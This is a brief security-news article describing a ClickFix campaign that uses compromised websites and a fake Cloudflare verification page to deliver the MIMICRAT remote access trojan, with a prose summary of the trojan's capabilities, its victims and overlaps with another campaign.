ClickFix Campaign Leverages Compromised Sites to Distribute MIMICRAT RAT Malware

Post Views: 7

Cybersecurity Researchers Uncover Sophisticated Campaign

Cybersecurity researchers have uncovered a sophisticated campaign, dubbed ClickFix, which leverages compromised websites across various industries and geographies to deliver a novel remote access trojan (RAT) known as MIMICRAT.

Key Features of the Campaign

This custom C++ RAT boasts an array of features, including Windows token impersonation, SOCKS5 tunneling, and a range of 22 commands for comprehensive post-exploitation capabilities.

Operational Sophistication

The campaign’s operational sophistication is notable, with compromised sites serving as delivery infrastructure, a multi-stage PowerShell chain bypassing ETW and AMSI, and the final implant communicating over HTTPS on port 443, masquerading as legitimate web analytics traffic.

According to researchers, the entry point for the infection sequence is a breached Bank Identification Number (BIN) validation service, bincheck[.]io, which has been injected with malicious JavaScript code.

This code loads an externally hosted PHP script, which in turn delivers the ClickFix lure, a fake Cloudflare verification page. The page instructs the victim to copy and paste a command into the Windows Run dialog, leading to the execution of a PowerShell command that contacts a command-and-control (C2) server to fetch a second-stage PowerShell script.

Command and Control Server

The C2 server communicates with the RAT using HTTPS, enabling the acceptance of two dozen commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.

Language Support and Reach

Notably, the campaign supports 17 languages, with lure content dynamically localized based on the victim’s browser language settings, broadening its effective reach.

Victims and Suspected Goals

Researchers have identified victims spanning multiple geographies, including a US-based university and multiple Chinese-speaking users. The ultimate goal of the attack is suspected to be ransomware deployment or data exfiltration.

Overlap with Other Campaigns

The campaign’s tactics and infrastructure also show overlaps with another ClickFix campaign, which leads to the deployment of the Matanbuchus 3.0 loader, serving as a conduit for the same RAT.

Conclusion

The discovery of this campaign highlights the importance of vigilance in the face of increasingly sophisticated threats. As the threat landscape continues to evolve, it is essential for organizations to remain proactive in their cybersecurity efforts, staying informed about the latest tactics, techniques, and procedures (TTPs) employed by threat actors.